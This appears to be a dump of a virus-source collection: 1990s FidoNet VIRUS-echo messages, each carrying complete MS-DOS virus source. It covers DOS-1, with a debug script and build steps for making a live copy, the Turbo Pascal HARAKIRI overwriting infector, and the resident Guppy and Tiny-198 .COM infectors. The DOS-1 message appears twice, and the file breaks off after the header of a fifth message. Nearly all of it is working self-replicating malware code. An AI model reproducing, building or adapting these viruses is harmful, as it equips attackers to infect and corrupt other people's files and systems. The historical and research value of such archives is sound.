; To : - *.* - Fri 11 Nov 94 08:10
; Subj : DOS_1.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Clif Jessop, 2:283/718 (06 Nov 94 16:35)
;* To : Mark Hapershaw
;* Subj : DOS_1.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Clif.Jessop@f718.n283.z2.fidonet.org
;DOS1 virus by the TridenT research group - Direct Action appending .COM
;This virus infects .COM files in the current directory using FCB's.
;Other than FCB use, the virus is VERY simple. Avoids infecting misnamed
;EXE files by using an 'M' at the beginning of files to mark infection.
;This virus requires a stub file made from the following debug script,
;to make it, compile the virus, then create the stub file by removing the
;semicolons from the code between the lines, saving it, and calling it
;vstub.hex. Then use the following commands:
; Debug <vstub.hex
; Copy /b vstub.com+dos1.com virus.com
;And you will have a live copy of the DOS-1 virus. Please be careful
;with it and do not release it.
;-=-=-=-=-=-=-=-=-=-=-=-=-=ð[Begin Debug Script]ð=-=-=-=-=-=-=-=-=-=-=-=-=
;e100 4d eb 6 90 90
;rbx
;0
;rcx
;5
;nvstub.com
;w
;q
;-=-=-=-=-=-=-=-=-=-=-=-=-=ð[End Debug Script]ð=-=-=-=-=-=-=-=-=-=-=-=-=
;Disassembly by Black Wolf
.model tiny
.code
org 100h
start:
dec bp
nop
int 20h
HostFile: ;Not present to preserve original compiler offsets.....
Virus_Entry:
call GetOffset
Displacement:
db 'DOS-1',0
GetOffset:
pop si
sub si,offset Displacement-start
cld
mov di,100h
push di ;Push DI on stack for ret...
push si ;Restore host file...
movsw
movsw
pop si
lea dx,[si+VirusDTA-start] ;set DS:DX = DTA
call SetDTA
mov ax,1100h ;Find first filename w/FCB's
FindFirstNext:
lea dx,[si+SearchString-start]
int 21h ;Find first/next filename
;using FCB's (*.COM)
or al,al ;Were any .COM files found?
jnz ResetDTA ;No.... exit virus.
lea dx,[si+VirusDTA-start]
mov ah,0fh
int 21h ;open .COM file w/FCB
or al,al ;Successful?
jnz FindNextFile ;No - find another.
push dx ;Push offset of DTA
mov di,dx
mov word ptr [di+0Eh],1 ;Set bytes per record to 1
xor ax,ax
mov [di+21h],ax ;Set Random Record Num to 0
mov [di+23h],ax ;?
lea dx,[si]
call SetDTA ;Set DTA to just before virus
;code in memory - Storage bytes..
lea dx,[di] ;DX = Virus DTA
mov ah,27h
mov cx,4
int 21h ;Read first 4 bytes w/FCB
cmp byte ptr [si],'M' ;Is it an EXE file or infected?
je CloseFile ;exit...
mov ax,[di+10h] ;AX = Filesize
mov [di+21h],ax ;Set current record to EOF
cmp ax,0F800h ;Is file above F800h bytes?
ja CloseFile ;Too large, exit
push ax
lea dx,[si]
call SetDTA ;Set DTA to storage bytes/virus.
lea dx,[di]
mov ah,28h
mov cx,end_virus-start
int 21h ;Write virus to end of file.
xor ax,ax
mov [di+21h],ax ;Reset file to beginning.
lea di,[si] ;Point DI to DTA
mov ax,0E94Dh ;4dh E9h = marker and jump
stosw
pop ax ;AX = jump size
stosw ;Put marker and jump into DTA
push dx
lea dx,[si]
call SetDTA ;Set DTA for write
pop dx
mov ah,28h
mov cx,4
int 21h ;Write in ID byte 'M' and jump
CloseFile:
pop dx
call SetDTA
mov ah,10h
int 21h ;Close file w/FCB
FindNextFile:
mov ah,12h
jmp short FindFirstNext ;Find next file...
ResetDTA:
mov dx,80h ;80h = default DTA
call SetDTA
retn
SetDTA:
mov ah,1Ah
int 21h ;Set DTA to DS:DX
retn
db 'MK' ;Musad Khafir's signature
SearchString:
db 0 ;Default Drive
db '????????COM' ;Search for all .COM files.
end_virus:
org 1d1h
VirusDTA:
end start
;-+- FMail 0.96â
; + Origin: The Hamburger Haven 1-318-478-9940 (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;Trubo Link Version 4.0 Copyright (c) 1991 Bugland International
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)

195
MSDOS/Virus.MSDOS.Unknown.vir28.asm Normal file
View File

@ -0,0 +1,195 @@
Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
Msg : 18 of 54
From : MeteO 2:5030/136 Tue 09 Nov 93 09:12
To : - *.* - Fri 11 Nov 94 08:10
Subj : DOS1.ASM
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
.RealName: Max Ivanov
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
* Kicked-up by MeteO (2:5030/136)
* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
* From : Alan Jones, 2:283/718 (06 Nov 94 16:36)
* To : Dr T.
* Subj : DOS1.ASM
ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
@RFC-Path:
ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
18.n283!not-for-mail
@RFC-Return-Receipt-To: Alan.Jones@f718.n283.z2.fidonet.org
;DOS1 virus by the TridenT research group - Direct Action appending .COM
;This virus infects .COM files in the current directory using FCB's.
;Other than FCB use, the virus is VERY simple. Avoids infecting misnamed
;EXE files by using an 'M' at the beginning of files to mark infection.
;This virus requires a stub file made from the following debug script,
;to make it, compile the virus, then create the stub file by removing the
;semicolons from the code between the lines, saving it, and calling it
;vstub.hex. Then use the following commands:
; Debug <vstub.hex
; Copy /b vstub.com+dos1.com virus.com
;And you will have a live copy of the DOS-1 virus. Please be careful
;with it and do not release it.
;-=-=-=-=-=-=-=-=-=-=-=-=-=ð[Begin Debug Script]ð=-=-=-=-=-=-=-=-=-=-=-=-=
;e100 4d eb 6 90 90
;rbx
;0
;rcx
;5
;nvstub.com
;w
;q
;-=-=-=-=-=-=-=-=-=-=-=-=-=ð[End Debug Script]ð=-=-=-=-=-=-=-=-=-=-=-=-=
;Disassembly by Black Wolf
.model tiny
.code
org 100h
start:
dec bp
nop
int 20h
HostFile: ;Not present to preserve original compiler offsets.....
Virus_Entry:
call GetOffset
Displacement:
db 'DOS-1',0
GetOffset:
pop si
sub si,offset Displacement-start
cld
mov di,100h
push di ;Push DI on stack for ret...
push si ;Restore host file...
movsw
movsw
pop si
lea dx,[si+VirusDTA-start] ;set DS:DX = DTA
call SetDTA
mov ax,1100h ;Find first filename w/FCB's
FindFirstNext:
lea dx,[si+SearchString-start]
int 21h ;Find first/next filename
;using FCB's (*.COM)
or al,al ;Were any .COM files found?
jnz ResetDTA ;No.... exit virus.
lea dx,[si+VirusDTA-start]
mov ah,0fh
int 21h ;open .COM file w/FCB
or al,al ;Successful?
jnz FindNextFile ;No - find another.
push dx ;Push offset of DTA
mov di,dx
mov word ptr [di+0Eh],1 ;Set bytes per record to 1
xor ax,ax
mov [di+21h],ax ;Set Random Record Num to 0
mov [di+23h],ax ;?
lea dx,[si]
call SetDTA ;Set DTA to just before virus
;code in memory - Storage bytes..
lea dx,[di] ;DX = Virus DTA
mov ah,27h
mov cx,4
int 21h ;Read first 4 bytes w/FCB
cmp byte ptr [si],'M' ;Is it an EXE file or infected?
je CloseFile ;exit...
mov ax,[di+10h] ;AX = Filesize
mov [di+21h],ax ;Set current record to EOF
cmp ax,0F800h ;Is file above F800h bytes?
ja CloseFile ;Too large, exit
push ax
lea dx,[si]
call SetDTA ;Set DTA to storage bytes/virus.
lea dx,[di]
mov ah,28h
mov cx,end_virus-start
int 21h ;Write virus to end of file.
xor ax,ax
mov [di+21h],ax ;Reset file to beginning.
lea di,[si] ;Point DI to DTA
mov ax,0E94Dh ;4dh E9h = marker and jump
stosw
pop ax ;AX = jump size
stosw ;Put marker and jump into DTA
push dx
lea dx,[si]
call SetDTA ;Set DTA for write
pop dx
mov ah,28h
mov cx,4
int 21h ;Write in ID byte 'M' and jump
CloseFile:
pop dx
call SetDTA
mov ah,10h
int 21h ;Close file w/FCB
FindNextFile:
mov ah,12h
jmp short FindFirstNext ;Find next file...
ResetDTA:
mov dx,80h ;80h = default DTA
call SetDTA
retn
SetDTA:
mov ah,1Ah
int 21h ;Set DTA to DS:DX
retn
db 'MK' ;Musad Khafir's signature
SearchString:
db 0 ;Default Drive
db '????????COM' ;Search for all .COM files.
end_virus:
org 1d1h
VirusDTA:
end start
-+- FidoPCB v1.4 [NR]
+ Origin: Miami Beach BBS - Nijmegen Nl - 080-732083 - ZyX 19K2 (2:283/718)
=============================================================================
Yoo-hooo-oo, -!
þ The MeÂeO
TAZOM Assembler Version 3.2 Copyright (c) 1988, 1992 Borland International
--- Aidstest Null: /Kill
* Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)

210
MSDOS/Virus.MSDOS.Unknown.vir29.pas Normal file
View File

@ -0,0 +1,210 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 19 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:12
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : HARAKIRI.PAS
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Hans Schotel, 2:283/718 (06 Nov 94 16:36)
;* To : Dr T.
;* Subj : HARAKIRI.PAS
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Hans.Schotel@f718.n283.z2.fidonet.org
;{+--------------------------------------------------------------------+}
;{| Harakiri Virus V1.50 91-09-01 |}
;{| WARNING!! WARNING!! This is a virus, compiled under TP 5.5 |}
;{+--------------------------------------------------------------------+}
Uses Dos;
Const Buf_Size=25;
Var
Buff : Array[1..5488] of Byte; { Antal som flyttas per g†ng! }
DirInfo : SearchRec;
Searchfile : String[20];
Debug : Boolean;
{------------------------------------------------------------------------}
Procedure Infect_File (Myfile:String);
Var
NumRead, NumWritten : Word;
FromF, ToF : File;
Begin
Assign(FromF,ParamStr(0)); { Open output file }
Reset(FromF, 1); { Record size = 1 }
If Debug then Writeln (Myfile);
Assign(ToF,MyFile); { Open output file }
Reset(ToF, 1); { Record size = 1 }
BlockRead(FromF,buff,SizeOf(Buff),NumRead);
BlockWrite(ToF,buff,NumRead,NumWritten);
Close(FromF);
Close(ToF);
End;
{------------------------------------------------------------------}
Function Check_File(Myfile:String) : Boolean;
Var
NumRead : Word;
NumWritten : Word;
FromF2 : File;
FromF : File;
j2 : Integer;
j1 : Integer;
Buf1 : Array[1..Buf_Size] of Byte; { Antal som flyttas per g†ng! }
Buf2 : Array[1..Buf_Size] of Byte; { Antal som flyttas per g†ng! }
Begin
j2:=1;
While j2<=Buf_Size do
begin
Buf1[j2]:=$20;
Buf2[j2]:=$20;
Inc(j2);
end;
Check_file := False;
Assign(FromF, ParamStr(0)); { Open input file }
Reset(FromF, 1); { Record size = 1 }
Assign (FromF2, Myfile);
Reset (FromF2, 1);
If Debug then Write ('--> '); If Debug then Writeln (Myfile);
BlockRead(FromF,buf1,SizeOf(buf1),NumRead);
BlockRead(FromF2,buf2,SizeOf(buf2),NumRead);
j1:=1;
While j1<=Buf_Size do
begin
If Buf1[j1] <> Buf2[j1] then
begin
If Debug then Writeln ('Ej Infekterad....!');
j1:=10000;
Inc (j1);
Check_file:=True;
end;
Inc (j1);
end;
If j1>=9999 then
begin
Check_file:=True;
end;
Close (FromF); Close (FromF2);
End;
{------------------------------------------------------------------}
Procedure Search_4_File (Sdir: String);
Var
Dir_save : Array[1..100] of string [12];
I,Imax : Integer;
Mask : String[80];
Attr : Integer;
Any_File_found : Boolean;
New_F : Boolean;
Antal_Infected : Integer;
Begin
Antal_Infected:=0;
If Debug then Writeln('Sdir = ' ,Sdir);
Mask := SDir + SearchFile;
Any_File_found := False;
FindFirst(Mask, $3F, DirInfo);
I := 0;
Begin
If DosError=0 then
begin
I := Length( SDir );
end;
I := 0;
While DosError=0 do
begin
If DirInfo.name[1] <> '.' then
begin
Any_File_found := true;
If Debug then Writeln(Dirinfo.name);
New_F := Check_File (SDir+DirInfo.Name);
If New_F=True then
begin
If Debug then Writeln ('Infecting file');
Infect_File (Sdir+DirInfo.Name);
Inc (Antal_Infected);
If Antal_Infected >= 4 then
begin
Writeln ('Program too big to fit in memory');
Halt;
end;
If Debug then Writeln (Antal_Infected);
end;
If New_F=False then
begin
If Debug then Writeln ('File Already Infected');
end;
end;
FindNext(DirInfo);
end; {while}
End;
Mask := Sdir + '*.*';
FindFirst(Mask, Directory, DirInfo); { look for dir only }
Imax := 0; I:= 1;
While DosError=0 do { G”r lista ”ver directories..}
Begin
If DirInfo.Attr and Directory <> 0 then
begin
If DirInfo.name[1] <> '.' then
begin
Dir_save[I] := DirInfo.Name;
Imax := I; inc(I);
end;
end;
FindNext(DirInfo);
End; {while}
I:=1;
While I <= Imax do
begin
Search_4_File(SDir + Dir_save[I] + '\');
I:= I+1;
end;
End;
{====Main===================================================================}
BEGIN
Debug := true;
SearchFile := '*.exe';
Search_4_File ('\');
SearchFile := '*.com';
Search_4_File ('\');
Writeln ('Your PC is alive and infected with the HARAKIRI virus!');
END.
-+- GoldED/386 2.50.B1016+
+ Origin: FidoNet * Mathieu Notris * Brussels-Belgium-Europe (2:283/718)
=============================================================================
Yoo-hooo-oo, -!
þ The MeÂeO
/A=NNNN Set NewExe segment alignment factor
--- Aidstest Null: /Kill
* Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)

191
MSDOS/Virus.MSDOS.Unknown.vir30.asm Normal file
View File

@ -0,0 +1,191 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 20 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : GUPPY.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Mikko Hypponen, 2:283/718 (06 Nov 94 16:39)
;* To : Brad Frazee
;* Subj : GUPPY.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Mikko.Hypponen@f718.n283.z2.fidonet.org
;***************************************************************************
;* The Guppy Virus *
;* Disassembly by Black Wolf *
;***************************************************************************
;* The Guppy virus is a relatively simple, very small, resident .COM *
;*infector. It uses the standard way for a regular program to go resident *
;*(i.e. Int 27) which makes the infected program terminate the first time *
;*run. After that, however, infected files will run perfectly. This virus*
;*uses interesting methods to restore the storage bytes, as well as a *
;*strange technique to restore control to an infected file after it has *
;*already gone memory resident. *
;* *
;*Note: The Guppy virus was originally assembled with an assembler other *
;* than Tasm, so to keep it exactly the same some commands must be *
;* entered directly as individual bytes. In these cases, the command *
;* is commented out and the bytes are found below it. *
;* *
;***************************************************************************
.model tiny
.radix 16
.code
org 100h
start:
call Get_Offset
Get_Offset:
pop si ;SI = offset of vir +
;(Get_Offset-Start)
mov ax,3521h
mov bx,ax
int 21h ;Get Int 21 Address
mov ds:[si+Int_21_Offset-103],bx ;Save old Int 21
mov ds:[si+Int_21_Segment-103],es
;mov dx,si ;Bytes vary between assemblers
db 89,0f2
;add dx,offset Int_21_Handler-104
db 83,0c2,1f
mov ah,25h
int 21h ;Set Int 21
inc dh ;Add 100h bytes to go resident
;from handler
push cs
pop es
int 27h ;Terminate & stay resident
Int_21_Handler:
cmp ax,4B00h ;Is call a Load & Execute?
je Infect ;Yes? Jump Infect
cmp al,21h ;Might it be a residency check?
jne Go_Int_21 ;No? Restore control to Int 21
;cmp ax,bx ;Are AX and BX the same?
db 39,0d8
jne Go_Int_21 ;No, Restore control to Int 21
push word ptr [si+3dh] ;3dh = offset of Storage_Bytes -
;Get_Offset
;This gets the first word of
;storage bytes, which is then
;popped to CS:100 to restore it.
mov bx,offset ds:[100] ;100 = Beginning of COM
pop word ptr [bx]
mov cl,[si+3Fh] ;Restore third storage byte.
mov [bx+2],cl
Restore_Control:
pop cx
push bx
iret ;Jump back to Host program.
Storage_Bytes db 0, 0, 0
Infect:
push ax
push bx
push dx
push ds
mov ax,3D02h
int 21h ;Open File for Read/Write Access
xchg ax,bx
call Get_Offset_Two
Get_Offset_Two:
pop si
push cs
pop ds
mov ah,3F
mov cx,3
sub si,10 ;Set SI=Storage_Bytes
;mov dx,si
db 89,0f2
int 21h ;Read first 3 bytes of file
cmp byte ptr [si],0E9h ;Is the first command a jump?
jne Close_File ;No? Jump to Close_File
mov ax,4202h
xor dx,dx
xor cx,cx
int 21h ;Go to end of file
xchg ax,di
mov ah,40h
mov cl,98h ;Virus Size
;mov dx,si
db 89,0f2
sub dx,40h ;Beginning of virus
int 21h ;Append virus to new host
mov ax,4200h
xor cx,cx
xor dx,dx
int 21h ;Go back to beginning of file
mov cl,3
;sub di,cx
db 29,0cf
mov [si+1],di
mov ah,40h
;mov dx,si
db 89,0f2
int 21h ;Write 3 byte jump to file
Close_File:
mov ah,3Eh
int 21h
pop ds
pop dx
pop bx
pop ax
Go_Int_21:
db 0EAh ;Go On With Int 21
Int_21_Offset dw ?
Int_21_Segment dw ?
end start
;-+- UC2 Support France
; + Origin: NETTIS Public Acces Internet (603)432-2517 (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/d Warn if duplicate symbols in libraries
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)

231
MSDOS/Virus.MSDOS.Unknown.vir31.asm Normal file
View File

@ -0,0 +1,231 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 21 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : TINY_198.ASM
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
;.RealName: Max Ivanov
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;* Kicked-up by MeteO (2:5030/136)
;* Area : VIRUS (Int: ˆ­ä®p¬ æ¨ï ® ¢¨pãá å)
;* From : Mikko Hypponen, 2:283/718 (06 Nov 94 16:40)
;* To : Gilbert Holleman
;* Subj : TINY_198.ASM
;ÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ
;@RFC-Path:
;ddt.demos.su!f400.n5020!f3.n5026!f2.n51!f550.n281!f512.n283!f35.n283!f7.n283!f7
;18.n283!not-for-mail
;@RFC-Return-Receipt-To: Mikko.Hypponen@f718.n283.z2.fidonet.org
page ,132
name TINY198
title The 'Tiny' virus, version TINY-198
.radix 16
; ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
; ú Bulgaria, 1404 Sofia, kv. "Emil Markov", bl. 26, vh. "W", et. 5, ap. 51 ú
; ú Telephone: Private: +359-2-586261, Office: +359-2-71401 ext. 255 ú
; ú ú
; ú The 'Tiny' Virus, version TINY-198 ú
; ú Disassembled by Vesselin Bontchev, July 1990 ú
; ú ú
; ú Copyright (c) Vesselin Bontchev 1989, 1990 ú
; ú ú
; ú This listing is only to be made available to virus researchers ú
; ú or software writers on a need-to-know basis. ú
; ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
; The disassembly has been tested by re-assembly using MASM 5.0.
code segment
assume cs:code, ds:code
org 100
seg_60 equ 600
v_len equ v_end-v_entry
start:
jmp v_entry ; Jump to virus code
db 'M' ; Virus signature
mov ax,4C00 ; Program terminate
int 21
v_entry:
call self ; Determine the start addres of the virus body
self:
pop si
sub si,3
push ax ; Save AX (to keep programs as DISKCOPY happy)
; Check whether the virus is already in memory and just run the program if so:
mov ah,0E9
int 21
mov di,seg_60 ; Point ES:DI at 0000:0600h (i.e, segment 60h)
xor cx,cx ; ES := 0
mov es,cx
mov cl,v_len ; CX := virus length
rep movsb ; Move the virus body there
; Transfer control to cont: by PUSHing its address
; on the stack and executing RETF:
push es
mov ax,cont-v_entry+seg_60
push ax
retf
; The original first 4 bytes of the infected file:
first4 db 0EBh, 2, 90, 90
; Resume execution from here (but already in segment 60h):
cont:
; Install new INT 21h handler and move the old one at INT 32h:
mov di,21*4
mov cl,2
mov ax,int_21-v_entry+seg_60
cld
lp:
push word ptr es:[di] ; Get old handler's address
pop word ptr es:[di+(32-21)*4] ; Move it at INT 32h
stosw ; Install the new one
mov ax,cs
loop lp ; Loop until done
; Save the original first 4 bytes of the infected program on the stack:
push word ptr cs:[first4-v_entry+seg_60]
push word ptr cs:[first4+2-v_entry+seg_60]
run_pgm:
mov di,offset start ; Point DI at program's start
pop word ptr [di+2] ; Restore the first 4 bytes of the program
pop word ptr [di]
pop ax ; Restore the original value of AX
push ds
push ds ; ES := DS
pop es
push di ; Push 100h on the stack
retf
mem_chk:
; Push the original first 4 bytes of the infected program on the stack:
push word ptr [si+first4-v_entry]
push word ptr [si+first4+2-v_entry]
jmp run_pgm ; And run the original program
int_21: ; New INT 21h handler
cmp ah,0E9 ; Memory check?
je mem_chk ; If infected, run the original program
cmp ax,4B00 ; EXEC function call?
jne end_21 ; Exit if not
push ax ; Save registers used
push bx
push cx
push dx
push di
push ds
push es
push cs ; ES := CS
pop es
mov ax,3D02 ; Open the file for both reading and writting
int 32
jc end_exec ; Exit on error
mov bx,ax ; Save the file handle in BX
mov ah,3F ; Read the first 4 bytes of the file
mov cx,4 ; 4 bytes to read
mov dx,first4-v_entry+seg_60 ; Put them in first4
mov di,dx ; Save first4 address in DI
push cs ; DS := CS
pop ds
int 32 ; Do it
; Check whether the file is already infected or is an .EXE file.
; The former contains the character `M' in its 3rd byte and
; the latter contains it either in the 0th or in the 1st byte.
push di ; Save DI
mov al,'M' ; Look for `M'
repne scasb
pop di ; Restore DI
je close ; Exit if file not suitable for infection
mov ax,4202 ; Seek to the end of file
xor cx,cx
xor dx,dx
int 32 ; Do it
push ax ; Save file length
mov dh,6 ; DX = 600h, i.e. point it at 0000:0600h
mov cl,v_len ; Length of virus body
mov ah,40 ; Append virus to file
int 32 ; Do it
mov ax,4200 ; Seek to the file beginning
xor cx,cx
xor dx,dx
int 32 ; Do it
mov dx,di ; Point DX at first4
mov al,0E9 ; Near JMP opcode
stosb ; Form the first instruction of the file
pop ax ; Restore file length in AX
sub ax,3 ; Subtract 3 (first instruction length)
stosw ; Form the JMP's opperand
mov al,'M' ; Add a `M' character to mark the file
stosb ; as infected
mov cl,4 ; Overwrite the first 4 bytes of the file
mov ah,40
int 32 ; Do it
close:
mov ah,3E ; Close the file
int 32
end_exec:
pop es ; Restore used registers
pop ds
pop di
pop dx
pop cx
pop bx
pop ax
; Exit through the original INT 21h handler:
end_21:
jmp dword ptr cs:[32*4]
v_end equ $ ; End of virus body
code ends
end start
;-+- FMail 0.96â
; + Origin: This virus is Microsoft Windows (2:283/718)
;=============================================================================
;
;Yoo-hooo-oo, -!
;
;
; þ The MeÂeO
;
;/iPATH Search PATH for include files
;
;--- Aidstest Null: /Kill
; * Origin: ùPVT.ViRIIúmainúboardú / Virus Research labs. (2:5030/136)

229
MSDOS/Virus.MSDOS.Unknown.vir32.asm Normal file
View File

@ -0,0 +1,229 @@
;Ä PVT.VIRII (2:465/65.4) ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ PVT.VIRII Ä
; Msg : 22 of 54
; From : MeteO 2:5030/136 Tue 09 Nov 93 09:13
; To : - *.* - Fri 11 Nov 94 08:10
; Subj : STACKVIR.ASM
